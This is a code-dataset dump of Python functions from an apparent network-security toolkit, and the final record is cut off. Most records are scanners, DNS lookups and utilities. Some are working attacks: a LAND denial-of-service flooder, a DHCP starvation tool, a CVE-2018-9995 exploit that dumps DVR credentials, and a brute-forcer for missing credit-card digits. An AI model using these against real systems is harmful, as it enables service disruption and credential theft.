_id
stringlengths
2
7
title
stringlengths
1
88
partition
stringclasses
3 values
text
stringlengths
75
19.8k
language
stringclasses
1 value
meta_information
dict
q29700
get_options
train
def get_options(server):
    """Retrieve the available HTTP verbs"""
    unreachable = (requests.exceptions.ConnectionError,
                   requests.exceptions.MissingSchema)

    # Don't follow redirects: we want the verbs of the URL the user gave us,
    # not of wherever it redirects to.  TLS verification is disabled on purpose.
    try:
        resp = requests.options(server, allow_redirects=False,
                                verify=False, timeout=5)
    except unreachable:
        return "Server {} is not available!".format(server)

    allow = resp.headers.get('Allow')
    if allow is None:
        return "Unable to get HTTP methods"
    return {'allowed': allow}
python
{ "resource": "" }
q29701
cmd_ping
train
def cmd_ping(ip, interface, count, timeout, wait, verbose):
    """The classic ping tool that send ICMP echo requests.

    \b
    # habu.ping 8.8.8.8
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    """
    if interface:
        conf.iface = interface

    # Silence scapy's own chatter; use a raw layer-3 socket.
    conf.verb = False
    conf.L3socket=L3RawSocket

    # Hand-built IP header; proto 1 selects ICMP as the payload protocol.
    layer3 = IP()
    layer3.dst = ip
    layer3.tos = 0
    layer3.id = 1
    layer3.flags = 0
    layer3.frag = 0
    layer3.ttl = 64
    layer3.proto = 1 # icmp

    # ICMP echo-request (type 8, code 0); id/seq are fixed at 0.
    layer4 = ICMP()
    layer4.type = 8 # echo-request
    layer4.code = 0
    layer4.id = 0
    layer4.seq = 0

    pkt = layer3 / layer4
    counter = 0

    while True:
        # sr1 sends one packet and waits up to `timeout` seconds for a reply.
        ans = sr1(pkt, timeout=timeout)

        if ans:
            if verbose:
                ans.show()
            else:
                print(ans.summary())
            del(ans)
        else:
            print('Timeout')

        counter += 1

        # count == 0 means "ping forever".
        if count != 0 and counter == count:
            break

        sleep(wait)

    return True
python
{ "resource": "" }
q29702
cmd_host
train
def cmd_host(verbose):
    """Collect information about the host where habu is running.

    Example:

    \b
    $ habu.host
    {
        "kernel": [
            "Linux",
            "demo123",
            "5.0.6-200.fc29.x86_64",
            "#1 SMP Wed Apr 3 15:09:51 UTC 2019",
            "x86_64",
            "x86_64"
        ],
        "distribution": [
            "Fedora",
            "29",
            "Twenty Nine"
        ],
        "libc": [
            "glibc",
            "2.2.5"
        ],
        "arch": "x86_64",
        "python_version": "3.7.3",
        "os_name": "Linux",
        "cpu": "x86_64",
        "static_hostname": "demo123",
        "fqdn": "demo123.lab.sierra"
    }
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')
        print("Gather information about the host...", file=sys.stderr)

    details = gather_details()

    # Guard clause: empty result means the probes failed entirely.
    if not details:
        print("[X] Unable to gather information")
        return True

    print(json.dumps(details, indent=4))
    return True
python
{ "resource": "" }
q29703
cmd_extract_hostname
train
def cmd_extract_hostname(infile, check, verbose, jsonout):
    """Extract hostnames from a file or stdin.

    Example:

    \b
    $ cat /var/log/some.log | habu.extract.hostname
    www.google.com
    ibm.com
    fileserver.redhat.com
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    data = infile.read()

    result = extract_hostname(data)

    if check:
        logging.info('Checking against DNS...')
        # BUG FIX: the original removed entries from `result` while iterating
        # over it, which makes the iterator skip the element right after every
        # removed one (so some non-resolving names survived the filter).
        # Build a new list instead.
        resolvable = []
        for candidate in result:
            try:
                socket.getaddrinfo(candidate, None)
            except socket.gaierror:
                continue
            resolvable.append(candidate)
        result = resolvable

    if jsonout:
        print(json.dumps(result, indent=4))
    else:
        print('\n'.join(result))
python
{ "resource": "" }
q29704
cmd_b64
train
def cmd_b64(f, do_decode):
    """ Encodes or decode data in base64, just like the command base64.

    \b
    $ echo awesome | habu.b64
    YXdlc29tZQo=

    \b
    $ echo YXdlc29tZQo= | habu.b64 -d
    awesome
    """
    data = f.read()

    # Guard clause: nothing to transform.
    if not data:
        print("Empty file or string!")
        return 1

    # Select the codec once, then write raw bytes straight to stdout's fd
    # so binary output is not mangled by text-mode buffering.
    transform = base64.b64decode if do_decode else base64.b64encode
    os.write(sys.stdout.fileno(), transform(data))
python
{ "resource": "" }
q29705
cmd_shodan
train
def cmd_shodan(ip, no_cache, verbose, output):
    """Simple shodan API client.

    Prints the JSON result of a shodan query.

    Example:

    \b
    $ habu.shodan 8.8.8.8
    {
        "hostnames": [
            "google-public-dns-a.google.com"
        ],
        "country_code": "US",
        "org": "Google",
        "data": [
            {
                "isp": "Google",
                "transport": "udp",
                "data": "Recursion: enabled",
                "asn": "AS15169",
                "port": 53,
                "hostnames": [
                    "google-public-dns-a.google.com"
                ]
            }
        ],
        "ports": [
            53
        ]
    }
    """
    habucfg = loadcfg()

    # Guard clause: an API key is mandatory.
    if 'SHODAN_APIKEY' not in habucfg:
        print('You must provide a shodan apikey. Use the ~/.habu.json file (variable SHODAN_APIKEY), or export the variable HABU_SHODAN_APIKEY')
        print('Get your API key from https://www.shodan.io/')
        sys.exit(1)

    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    result = shodan_get_result(ip, habucfg['SHODAN_APIKEY'], no_cache, verbose)

    output.write('{}\n'.format(json.dumps(result, indent=4)))
python
{ "resource": "" }
q29706
cmd_hasher
train
def cmd_hasher(f, algorithm):
    """Compute various hashes for the input data, that can be a file or a stream.

    Example:

    \b
    $ habu.hasher README.rst
    md5          992a833cd162047daaa6a236b8ac15ae README.rst
    ripemd160    0566f9141e65e57cae93e0e3b70d1d8c2ccb0623 README.rst
    sha1         d7dbfd2c5e2828eb22f776550c826e4166526253 README.rst
    sha256       6bb22d927e1b6307ced616821a1877b6cc35e... README.rst
    sha512       8743f3eb12a11cf3edcc16e400fb14d599b4a... README.rst
    whirlpool    96bcc083242e796992c0f3462f330811f9e8c... README.rst

    You can also specify which algorithm to use. In such case, the output is
    only the value of the calculated hash:

    \b
    $ habu.hasher -a md5 README.rst
    992a833cd162047daaa6a236b8ac15ae README.rst
    """
    data = f.read()

    # Guard clause: nothing to hash.
    if not data:
        print("Empty file or string!")
        return 1

    if not algorithm:
        # No algorithm selected: print the whole table, one row per digest.
        for algo, digest in hasher(data).items():
            print("{:<12} {} {}".format(algo, digest, f.name))
    else:
        # Single algorithm: print only its value.
        print(hasher(data, algorithm)[algorithm], f.name)
python
{ "resource": "" }
q29707
cmd_tcpflags
train
def cmd_tcpflags(ip, port, flags, rflags, verbose):
    """Send TCP packets with different flags and tell what responses receives.

    It can be used to analyze how the different TCP/IP stack implementations
    and configurations responds to packet with various flag combinations.

    Example:

    \b
    # habu.tcpflags www.portantier.com
    S  -> SA
    FS -> SA
    FA -> R
    SA -> R

    By default, the command sends all possible flag combinations. You can
    specify which flags must ever be present (reducing the quantity of
    possible combinations), with the option '-f'.

    Also, you can specify which flags you want to be present on the response
    packets to show, with the option '-r'.

    With the next command, you see all the possible combinations that have the
    FIN (F) flag set and generates a response that contains the RST (R) flag.

    Example:

    \b
    # habu.tcpflags -f F -r R www.portantier.com
    FPA  -> R
    FSPA -> R
    FAU  -> R
    """
    conf.verb = False

    # flags=(0, 255) makes scapy emit one packet per possible flag byte,
    # i.e. all 256 TCP flag combinations.
    pkts = IP(dst=ip) / TCP(flags=(0, 255), dport=port)

    out = "{:>8} -> {:<8}"

    for pkt in pkts:
        # If -f restricted the sent flags, skip combinations that do not
        # contain every requested flag letter.
        if not flags or all(i in pkt.sprintf(r"%TCP.flags%") for i in flags):
            ans = sr1(pkt, timeout=0.2)
            if ans:
                # Same filter for the response flags (-r).
                if not rflags or all(i in ans.sprintf(r"%TCP.flags%") for i in rflags):
                    print(out.format(pkt.sprintf(r"%TCP.flags%"), ans.sprintf(r"%TCP.flags%")))

    return True
python
{ "resource": "" }
q29708
cmd_land
train
def cmd_land(ip, count, port, iface, verbose):
    """This command implements the LAND attack, that sends packets forging the
    source IP address to be the same that the destination IP. Also uses the
    same source and destination port.

    The attack is very old, and can be used to make a Denial of Service on
    old systems, like Windows NT 4.0. More information here:
    https://en.wikipedia.org/wiki/LAND

    \b
    # sudo habu.land 172.16.0.10
    ............

    Note: Each dot (.) is a sent packet. You can specify how many packets
    send with the '-c' option. The default is never stop. Also, you can
    specify the destination port, with the '-p' option.
    """
    conf.verb = False

    if iface:
        conf.iface = iface

    # LAND packet: source address and port forged to match the destination.
    pkt = IP(src=ip, dst=ip) / TCP(sport=port, dport=port)

    sent = 0

    while True:
        send(pkt)
        sent += 1

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        # count == 0 means "send forever".
        if count != 0 and sent == count:
            break

    return True
python
{ "resource": "" }
q29709
query_bulk
train
def query_bulk(names):
    """Query server with multiple entries."""
    # Fire off one asynchronous query per name.
    pending = [__threaded_query(name) for name in names]

    # Poll once per second until every future has completed.
    while not all(f.done() for f in pending):
        sleep(1)

    return [f.result() for f in pending]
python
{ "resource": "" }
q29710
lookup_reverse
train
def lookup_reverse(ip_address):
    """Perform a reverse lookup of IP address.

    Returns {'hostname': name} on success, or {} when the argument is not a
    valid IPv4/IPv6 address.
    """
    try:
        # Validation only: raises ValueError for anything that is not an IP.
        # (The original wrapped this in a no-op type() call, now removed.)
        ipaddress.ip_address(ip_address)
    except ValueError:
        return {}

    record = reversename.from_address(ip_address)
    # The PTR answer is a FQDN with a trailing dot; strip it.
    hostname = str(resolver.query(record, "PTR")[0])[:-1]
    return {'hostname': hostname}
python
{ "resource": "" }
q29711
lookup_forward
train
def lookup_forward(name):
    """Perform a forward lookup of a hostname.

    Returns a dict with at most the keys 'ipv4' and 'ipv6' (one
    representative address each).  Propagates socket.gaierror when the name
    does not resolve, exactly like the underlying getaddrinfo call.
    """
    ip_addresses = {}

    # Deduplicate: getaddrinfo yields one tuple per socket type/protocol.
    addresses = list(set(str(ip[4][0]) for ip in socket.getaddrinfo(
        name, None)))

    # NOTE: the original checked `addresses is None`, but list() never returns
    # None, so that branch was dead code and has been removed.
    for address in addresses:
        parsed = ipaddress.ip_address(address)
        # isinstance replaces the original `type(...) is` checks; ip_address()
        # returns exactly IPv4Address or IPv6Address, so behavior is unchanged.
        if isinstance(parsed, ipaddress.IPv4Address):
            ip_addresses['ipv4'] = address
        elif isinstance(parsed, ipaddress.IPv6Address):
            ip_addresses['ipv6'] = address

    return ip_addresses
python
{ "resource": "" }
q29712
cmd_crtsh
train
def cmd_crtsh(domain, no_cache, no_validate, verbose):
    """Downloads the certificate transparency logs for a domain and check
    with DNS queries if each subdomain exists.

    Uses multithreading to improve the performance of the DNS queries.

    Example:

    \b
    $ sudo habu.crtsh securetia.com
    [
        "karma.securetia.com.",
        "www.securetia.com."
    ]
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    if not no_cache:
        # Cache crt.sh responses for an hour under the user's home directory.
        homedir = pwd.getpwuid(os.getuid()).pw_dir
        requests_cache.install_cache(homedir + '/.habu_requests_cache', expire_after=3600)

    if verbose:
        print("Downloading subdomain list from https://crt.sh ...", file=sys.stderr)

    req = requests.get("https://crt.sh/?q=%.{d}&output=json".format(d=domain))

    if req.status_code != 200:
        print("[X] Information not available!")
        exit(1)

    # Collect unique lowercase names, dropping wildcard entries.
    subdomains = list({
        entry['name_value'].lower()
        for entry in json.loads(req.text)
        if '*' not in entry['name_value'].lower()
    })

    if no_validate:
        print(json.dumps(sorted(subdomains), indent=4))
        return True

    if verbose:
        print("Validating subdomains against DNS servers ...", file=sys.stderr)

    validated = [str(answer.qname) for answer in query_bulk(subdomains) if answer]

    print(json.dumps(sorted(validated), indent=4))
    return True
python
{ "resource": "" }
q29713
cmd_dns_lookup_forward
train
def cmd_dns_lookup_forward(hostname, verbose):
    """Perform a forward lookup of a given hostname.

    Example:

    \b
    $ habu.dns.lookup.forward google.com
    {
        "ipv4": "172.217.168.46",
        "ipv6": "2a00:1450:400a:802::200e"
    }
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')
        print("Looking up %s..." % hostname, file=sys.stderr)

    print(json.dumps(lookup_forward(hostname), indent=4))

    return True
python
{ "resource": "" }
q29714
cmd_cve_2018_9995
train
def cmd_cve_2018_9995(ip, port, verbose):
    """Exploit the CVE-2018-9995 vulnerability, present on various DVR systems.

    Note: Based on the original code from Ezequiel Fernandez (@capitan_alfa).

    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9995

    Example:

    \b
    $ python habu.cve.2018-9995 82.202.102.42
    [
        {
            "uid": "admin",
            "pwd": "securepassword",
            "role": 2,
            "enmac": 0,
            "mac": "00:00:00:00:00:00",
            "playback": 4294967295,
            "view": 4294967295,
            "rview": 4294967295,
            "ptz": 4294967295,
            "backup": 4294967295,
            "opt": 4294967295
        }
    ]
    """
    base_url = 'http://' + ip + ':' + str(port)
    fullhost = base_url + '/device.rsp?opt=user&cmd=list'

    headers = {
        'Host': ip,
        'User-Agent': 'Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        # NOTE(review): header name is misspelled ('Accept-Languag') in the
        # original exploit; kept byte-identical on purpose.
        'Accept-Languag': 'es-AR,en-US;q=0.7,en;q=0.3',
        'Connection': 'close',
        'Content-Type': 'text/html',
        'Cookie': 'uid=admin',
    }

    # The two failure modes (request error, non-JSON body) were handled the
    # same way in the original, so a single try block covers both.
    try:
        response = requests.get(fullhost, headers=headers, timeout=10)
        data = response.json()
    except Exception as e:
        print('Exception:', e)
        sys.exit(1)

    print(json.dumps(data["list"], indent=4))
python
{ "resource": "" }
q29715
Command.pid
train
def pid(self):
    """The process' PID."""
    sub = self.subprocess
    # pexpect's PopenSpawn wraps the real Popen object in `.proc`.
    if hasattr(sub, 'proc'):
        return sub.proc.pid
    # Plain subprocess.Popen exposes `.pid` directly.
    return sub.pid
python
{ "resource": "" }
q29716
Command.run
train
def run(self, block=True, binary=False, cwd=None):
    """Runs the given command, with or without pexpect functionality enabled."""
    self.blocking = block

    if self.blocking:
        # Plain subprocess path: text mode unless binary output was requested.
        kwargs = self._default_popen_kwargs.copy()
        kwargs['universal_newlines'] = not binary
        if cwd:
            kwargs['cwd'] = cwd
        child = subprocess.Popen(self._popen_args, **kwargs)
    else:
        # pexpect path, for interactive (expect-style) use.
        kwargs = self._default_pexpect_kwargs.copy()
        if binary:
            kwargs['encoding'] = None
        if cwd:
            kwargs['cwd'] = cwd
        # Keep Python children unbuffered so expect() sees output promptly.
        kwargs['env']['PYTHONUNBUFFERED'] = '1'
        child = PopenSpawn(self._popen_args, **kwargs)

    self.subprocess = child
    self.was_run = True
python
{ "resource": "" }
q29717
Command.send
train
def send(self, s, end=os.linesep, signal=False):
    """Sends the given string or signal to std_in."""
    # Guard clause: blocking commands have no interactive stdin to feed.
    if self.blocking:
        raise RuntimeError('send can only be used on non-blocking commands.')

    if signal:
        # `s` is a signal number in this mode, not text.
        self.subprocess.send_signal(s)
        return None

    payload = s + end
    if self._uses_subprocess:
        return self.subprocess.communicate(payload)
    return self.subprocess.send(payload)
python
{ "resource": "" }
q29718
cmd_arp_sniff
train
def cmd_arp_sniff(iface):
    """Listen for ARP packets and show information for each device.

    Columns: Seconds from last packet | IP | MAC | Vendor

    Example:

    \b
    1   192.168.0.1     a4:08:f5:19:17:a4   Sagemcom Broadband SAS
    7   192.168.0.2     64:bc:0c:33:e5:57   LG Electronics (Mobile Communications)
    2   192.168.0.5     00:c2:c6:30:2c:58   Intel Corporate
    6   192.168.0.7     54:f2:01:db:35:58   Samsung Electronics Co.,Ltd
    """
    conf.verb = False

    if iface:
        conf.iface = iface

    print("Waiting for ARP packets...", file=sys.stderr)

    # Blocks forever: procpkt is invoked once per captured ARP packet and
    # nothing is kept in memory (store=False).
    sniff(filter="arp", store=False, prn=procpkt)
python
{ "resource": "" }
q29719
cmd_web_tech
train
def cmd_web_tech(url, no_cache, verbose):
    """Use Wappalyzer apps.json database to identify technologies used on a web application.

    Reference: https://github.com/AliasIO/Wappalyzer

    Note: This tool only sends one request. So, it's stealth and not suspicious.

    \b
    $ habu.web.tech https://woocomerce.com
    {
        "Nginx": {
            "categories": [
                "Web Servers"
            ]
        },
        "PHP": {
            "categories": [
                "Programming Languages"
            ]
        },
        "WooCommerce": {
            "categories": [
                "Ecommerce"
            ],
            "version": "6.3.1"
        },
        "WordPress": {
            "categories": [
                "CMS",
                "Blogs"
            ]
        },
    }
    """
    # web_tech() does the single HTTP request and the fingerprint matching;
    # this command only pretty-prints its result.
    print(json.dumps(web_tech(url, no_cache, verbose), indent=4))
python
{ "resource": "" }
q29720
cmd_tcpscan
train
def cmd_tcpscan(ip, port, iface, flags, sleeptime, timeout, show_all, verbose):
    """TCP Port Scanner.

    Print the ports that generated a response with the SYN flag or (if show
    use -a) all the ports that generated a response.

    It's really basic compared with nmap, but who is comparing?

    Example:

    \b
    # habu.tcpscan -p 22,23,80,443 -s 1 45.77.113.133
    22 S -> SA
    80 S -> SA
    443 S -> SA
    """
    # NOTE(review): the `timeout` parameter is accepted but never used, and
    # `sleeptime` only selects serial mode (no actual sleep) — confirm intent.
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    conf.verb = False

    if iface:
        conf.iface = iface

    # Only digits, commas and dashes are accepted in the port spec.
    port_regex = r'^[0-9,-]+$'

    if not re.match(port_regex, port):
        logging.critical("Invalid port specification")
        return False

    ports = []

    # Expand "a-b" ranges and comma-separated entries into a flat list.
    for p in str(port).split(','):
        if '-' in p:
            first, last = p.split('-')
            for n in range(int(first), int(last)+1):
                ports.append(n)
        else:
            ports.append(int(p))

    out = "{port} {sflags} -> {rflags}"

    # One probe per port, all carrying the user-selected TCP flags.
    pkts = IP(dst=ip)/TCP(flags=flags, dport=ports)

    if sleeptime:
        # Serial mode: send one probe at a time and collect (sent, reply) pairs.
        res = []
        for pkt in pkts:
            logging.info(pkt.summary())
            _ = sr1(pkt)
            if _:
                logging.info(_.summary())
                res.append((pkt, _))
    else:
        # Parallel mode: let scapy send everything and match the answers.
        res, unans = sr(pkts, verbose=verbose)

    for s,r in res:
        # By default only show replies carrying SYN (open ports); -a shows all.
        if show_all or 'S' in r.sprintf(r"%TCP.flags%"):
            print(out.format(
                port=s[TCP].dport,
                sflags=s.sprintf(r"%TCP.flags%"),
                rflags=r.sprintf(r"%TCP.flags%")
            ))
python
{ "resource": "" }
q29721
cmd_dns_lookup_reverse
train
def cmd_dns_lookup_reverse(ip_address, verbose):
    """Perform a reverse lookup of a given IP address.

    Example:

    \b
    $ $ habu.dns.lookup.reverse 8.8.8.8
    {
        "hostname": "google-public-dns-a.google.com"
    }
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')
        print("Looking up %s..." % ip_address, file=sys.stderr)

    answer = lookup_reverse(ip_address)

    # lookup_reverse returns {} when the argument is not a valid address.
    if not answer:
        print("[X] %s is not valid IPv4/IPV6 address" % ip_address)
        return True

    print(json.dumps(answer, indent=4))
    return True
python
{ "resource": "" }
q29722
cmd_crack_luhn
train
def cmd_crack_luhn(number):
    """Having known values for a Luhn validated number, obtain the possible
    unknown numbers.

    Numbers that use the Luhn algorithm for validation are Credit Cards,
    IMEI, National Provider Identifier in the United States, Canadian
    Social Insurance Numbers, Israel ID Numbers and Greek Social Security
    Numbers (ΑΜΚΑ).

    The '-' characters are ignored. Define the missing numbers with the 'x'
    character.

    Reference: https://en.wikipedia.org/wiki/Luhn_algorithm

    Example:

    \b
    $ habu.crack.luhn 4509-xxxx-3160-6445
    """
    number = number.replace('-', '')
    unknown_count = number.count('x')

    # Guard clause: everything except the 'x' placeholders must be a digit.
    if not number.replace('x', '').isdigit():
        print('Invalid format. Please, read the documentation.', file=sys.stderr)
        sys.exit(1)

    # Enumerate every digit assignment for the 'x' positions (zero-padded,
    # ascending) and print the candidates that pass the Luhn check.
    for n in range(10 ** unknown_count):
        fill = '{:0{count}}'.format(n, count=unknown_count)
        candidate = number
        for digit in fill:
            candidate = candidate.replace('x', digit, 1)
        if luhn_validate(candidate):
            print(candidate)
python
{ "resource": "" }
q29723
cmd_protoscan
train
def cmd_protoscan(ip, iface, timeout, all_protocols, verbose):
    """ Send IP packets with different protocol field content to guess what
    layer 4 protocols are available.

    The output shows which protocols doesn't generate a 'protocol-unreachable'
    ICMP response.

    Example:

    \b
    $ sudo python cmd_ipscan.py 45.77.113.133
    1 icmp
    2 igmp
    4 ipencap
    6 tcp
    17 udp
    41 ipv6
    47 gre
    50 esp
    51 ah
    58 ipv6_icmp
    97 etherip
    112 vrrp
    115 l2tp
    132 sctp
    137 mpls_in_ip
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    conf.verb = False

    if iface:
        conf.iface = iface

    # Invert scapy's {name: number} protocol table into {number: name}.
    protocols = {num: name for name, num in conf.protocols.__dict__.items() if isinstance(num, int)}

    if all_protocols:
        # BUG FIX: the original assigned the tuple (0, 255) here, which later
        # crashed on `protocols.keys()` (tuples have no .keys()) and on the
        # final `protocols[proto]` name lookup.  Keep the dict shape and just
        # extend it to the full 8-bit protocol space.
        for num in range(256):
            protocols.setdefault(num, 'unknown')

    ans, unans = sr(IP(dst=ip, proto=list(protocols.keys()))/"SCAPY", retry=0, timeout=timeout, verbose=verbose)

    # No answer at all means no ICMP protocol-unreachable came back, so the
    # protocol is considered available.
    allowed_protocols = [pkt['IP'].proto for pkt in unans]

    for proto in sorted(allowed_protocols):
        print('{:<4} {}'.format(proto, protocols[proto]))
python
{ "resource": "" }
q29724
cmd_http_options
train
def cmd_http_options(server, verbose):
    """Retrieve the available HTTP methods of a web server.

    Example:

    \b
    $ habu.http.options -v http://google.com
    {
        "allowed": "GET, HEAD"
    }
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')
        print("[-] Retrieving the HTTP headers of the server...")

    options = get_options(server)

    # get_options returns a dict on success and an error string on failure.
    if isinstance(options, dict):
        print(json.dumps(options, indent=4))
        if verbose:
            print("[+] HTTP options from {} retrieved".format(server))
    else:
        print("[X] {}".format(options), file=sys.stderr)

    return True
python
{ "resource": "" }
q29725
cmd_arp_ping
train
def cmd_arp_ping(ip, iface, verbose):
    """ Send ARP packets to check if a host it's alive in the local network.

    Example:

    \b
    # habu.arp.ping 192.168.0.1
    Ether / ARP is at a4:08:f5:19:17:a4 says 192.168.0.1 / Padding
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    conf.verb = False

    if iface:
        conf.iface = iface

    # Broadcast a who-has ARP request and collect replies for up to 2 seconds.
    res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=2)

    for _, pkt in res:
        if verbose:
            # NOTE(review): pkt.show() prints itself and returns None, so this
            # also emits a bare "None" line — confirm intent.
            print(pkt.show())
        else:
            print(pkt.summary())
python
{ "resource": "" }
q29726
cmd_dhcp_starvation
train
def cmd_dhcp_starvation(iface, timeout, sleeptime, verbose):
    """Send multiple DHCP requests from forged MAC addresses to fill the DHCP
    server leases.

    When all the available network addresses are assigned, the DHCP server
    don't send responses. So, some attacks, like DHCP spoofing, can be made.

    \b
    # habu.dhcp_starvation
    Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.6:bootpc / BOOTP / DHCP
    Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.7:bootpc / BOOTP / DHCP
    Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.8:bootpc / BOOTP / DHCP
    """
    # NOTE(review): the `timeout` parameter is unused; srp() below always
    # waits a fixed 1 second — confirm intent.
    conf.verb = False

    if iface:
        conf.iface = iface

    # Offers come back addressed to forged MACs, so disable scapy's
    # reply-address check.
    conf.checkIPaddr = False

    # Static layers of the DHCP DISCOVER, built once.
    ether = Ether(dst="ff:ff:ff:ff:ff:ff")
    ip = IP(src="0.0.0.0",dst="255.255.255.255")
    udp = UDP(sport=68, dport=67)
    dhcp = DHCP(options=[("message-type","discover"),"end"])

    while True:
        # Fresh random client MAC on each iteration to burn another lease.
        bootp = BOOTP(chaddr=str(RandMAC()))
        dhcp_discover = ether / ip / udp / bootp / dhcp
        ans, unans = srp(dhcp_discover, timeout=1) # Press CTRL-C after several seconds

        for _, pkt in ans:
            if verbose:
                print(pkt.show())
            else:
                print(pkt.sprintf(r"%IP.src% offers %BOOTP.yiaddr%"))

        sleep(sleeptime)
python
{ "resource": "" }
q29727
cmd_http_headers
train
def cmd_http_headers(server, verbose):
    """Retrieve the HTTP headers of a web server.

    Example:

    \b
    $ habu.http.headers http://duckduckgo.com
    {
        "Server": "nginx",
        "Date": "Sun, 14 Apr 2019 00:00:55 GMT",
        "Content-Type": "text/html",
        "Content-Length": "178",
        "Connection": "keep-alive",
        "Location": "https://duckduckgo.com/",
        "X-Frame-Options": "SAMEORIGIN",
        "Content-Security-Policy": "default-src https: blob: data: 'unsafe-inline' 'unsafe-eval'",
        "X-XSS-Protection": "1;mode=block",
        "X-Content-Type-Options": "nosniff",
        "Referrer-Policy": "origin",
        "Expect-CT": "max-age=0",
        "Expires": "Mon, 13 Apr 2020 00:00:55 GMT",
        "Cache-Control": "max-age=31536000"
    }
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    if verbose:
        print("[-] Retrieving the HTTP headers of the server...")

    headers = get_headers(server)

    if headers is not False:
        print(json.dumps(headers, indent=4))
    else:
        # BUG FIX: the original printed the literal "{}" placeholder because
        # it never called .format(server) on this message.
        print("[X] URL {} is not valid!".format(server), file=sys.stderr)

    if verbose:
        print("[+] HTTP headers from {} retrieved".format(server))

    return True
python
{ "resource": "" }
q29728
cmd_fernet
train
def cmd_fernet(key, decrypt, ttl, i, o):
    """Fernet cipher.

    Uses AES-128-CBC with HMAC

    Note: You must use a key to cipher with Fernet. Use the -k paramenter or
    set the FERNET_KEY configuration value. The keys can be generated with
    the command habu.fernet.genkey

    Reference: https://github.com/fernet/spec/blob/master/Spec.md

    Example:

    \b
    $ "I want to protect this string" | habu.fernet
    gAAAAABbXnCGoCULLuVNRElYTbEcwnek9iq5jBKq9JAN3wiiBUzPqpUgV5oWvnC6xfIA...

    \b
    $ echo gAAAAABbXnCGoCULLuVNRElYTbEcwnek9iq5jBKq9JAN3wiiBUzPqpUgV5oWvnC6xfIA... | habu.fernet -d
    I want to protect this string
    """
    habucfg = loadcfg()

    # No key on the command line: fall back to the configuration file.
    if not key:
        if 'FERNET_KEY' in habucfg:
            key = habucfg['FERNET_KEY']
        else:
            print(ERROR_NOKEY, file=sys.stderr)
            sys.exit(1)

    # Fernet expects None (not 0/'') to mean "no time-to-live check".
    ttl = ttl or None

    cipher = Fernet(key)
    data = i.read()

    if not decrypt:
        token = cipher.encrypt(data)
    else:
        try:
            token = cipher.decrypt(data, ttl)
        except Exception:
            print("Error decrypting", file=sys.stderr)
            sys.exit(1)

    print(token.decode(), end='')
python
{ "resource": "" }
q29729
cmd_isn
train
def cmd_isn(ip, port, count, iface, graph, verbose):
    """Create TCP connections and print the TCP initial sequence numbers for
    each one.

    \b
    $ sudo habu.isn -c 5 www.portantier.com
    1962287220
    1800895007
    589617930
    3393793979
    469428558

    Note: You can get a graphical representation (needs the matplotlib
    package) using the '-g' option to better understand the randomness.
    """
    conf.verb = False

    if iface:
        conf.iface = iface

    isn_values = []

    for _ in range(count):
        # SYN from a fresh random source port; the reply's SEQ is the ISN.
        pkt = IP(dst=ip)/TCP(sport=RandShort(), dport=port, flags="S")
        ans = sr1(pkt, timeout=0.5)
        if ans:
            # Complete the handshake with an ACK so the peer does not keep
            # retransmitting the SYN-ACK.
            send(IP(dst=ip)/TCP(sport=pkt[TCP].sport, dport=port, ack=ans[TCP].seq + 1, flags='A'))
            isn_values.append(ans[TCP].seq)
            if verbose:
                ans.show2()

    if graph:
        # matplotlib is optional; only needed for the -g scatter plot.
        try:
            import matplotlib.pyplot as plt
        except ImportError:
            print("To graph support, install matplotlib")
            return 1

        plt.plot(range(len(isn_values)), isn_values, 'ro')
        plt.show()
    else:
        for v in isn_values:
            print(v)

    return True
python
{ "resource": "" }
q29730
cmd_traceroute
train
def cmd_traceroute(ip, port, iface):
    """TCP traceroute.

    Identify the path to a destination getting the ttl-zero-during-transit
    messages.

    Note: On the internet, you can have various valid paths to a device.

    Example:

    \b
    # habu.traceroute 45.77.113.133
    IP / ICMP 192.168.0.1 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror
    IP / ICMP 10.242.4.197 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror / Padding
    IP / ICMP 200.32.127.98 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror / Padding
    .
    IP / ICMP 4.16.180.190 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror
    .
    IP / TCP 45.77.113.133:http > 192.168.0.5:ftp_data SA / Padding

    Note: It's better if you use a port that is open on the remote system.
    """
    conf.verb = False

    if iface:
        conf.iface = iface

    # One TCP probe per TTL, from 1 to 16 hops.
    pkts = IP(dst=ip, ttl=(1, 16)) / TCP(dport=port)

    for pkt in pkts:
        ans = sr1(pkt, timeout=1, iface=conf.iface)

        # Silent hop: print a dot and move to the next TTL.
        if not ans:
            print('.')
            continue

        print(ans.summary())

        # 18 == SYN+ACK: the destination itself answered, path complete.
        if TCP in ans and ans[TCP].flags == 18:
            break

    return True
python
{ "resource": "" }
q29731
web_screenshot
train
def web_screenshot(url, outfile, browser=None):
    """Create a screenshot of a website.

    Uses the first available of firefox / chromium-browser (or the one
